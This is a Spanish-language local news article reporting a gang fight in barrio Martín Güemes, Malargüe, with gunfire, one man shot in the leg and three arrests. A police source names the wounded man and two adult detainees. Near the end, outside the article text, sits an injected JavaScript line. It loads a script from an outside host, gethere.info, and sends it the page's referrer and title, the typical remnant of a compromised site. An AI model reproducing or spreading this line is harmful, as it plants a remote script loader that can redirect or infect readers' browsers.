Por lo general los disturbios ocurren en la noche o en la madrugada, sin embargo en la jornada de hoy, pasadas las 17 horas, la tranquilidad en el barrio Martín Güemes se perdió y los vecinos fueron testigos de un operativo que duró más de una hora.

La pelea entre dos bandas comenzó en la intersección de Ingeniero Barrera y Enrique Mosconi, del barrio Martín Güemes. Los jóvenes se agredieron con golpes de puño y también se efectuaron detonaciones de arma de fuego, según informó a Malargüe a Diario el subcomisario Mauricio Ferreyra.

Al momento del arribo de personal policial los integrantes de los dos grupos se dieron a la fuga, por lo que se inició una persecución.

disturbios con marca 3

Finalmente la policía logró detener a tres sujetos de sexo masculino, dos mayores de edad y un menor, quienes quedaron a disposición del Segundo Juzgado de Instrucción.

Por la riña, una persona de sexo masculino terminó con una herida de bala en una de sus piernas, con un orificio de entrada pero no de salida, quien fue asistido en el Hospital Malargüe.

Ferreyra aclaró que en el hecho no se secuestraron armas de fuego. El entrevistado agregó que una movilidad resultó con una ventanilla rota, como consecuencia de un cabezazo de uno de los detenidos, quien terminó con un corte en el cuero cabelludo.

Cabe mencionar que dos de los detenidos estarían vinculados con un asalto a mano armada, ocurrido en el mismo barrio.

Antes de finalizar, le consultamos al Subcomisario por la identidad de los involucrados, a lo que respondió: “En el lugar nos encontramos con un herido de arma de fuego, es el señor José Marcelino González, mientras que de los detenidos hay un menor del que no puedo revelar su identidad y los otros dos jóvenes se llaman Facundo Javier Videla y Daniel Ernesto Reyes.”

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Comentarios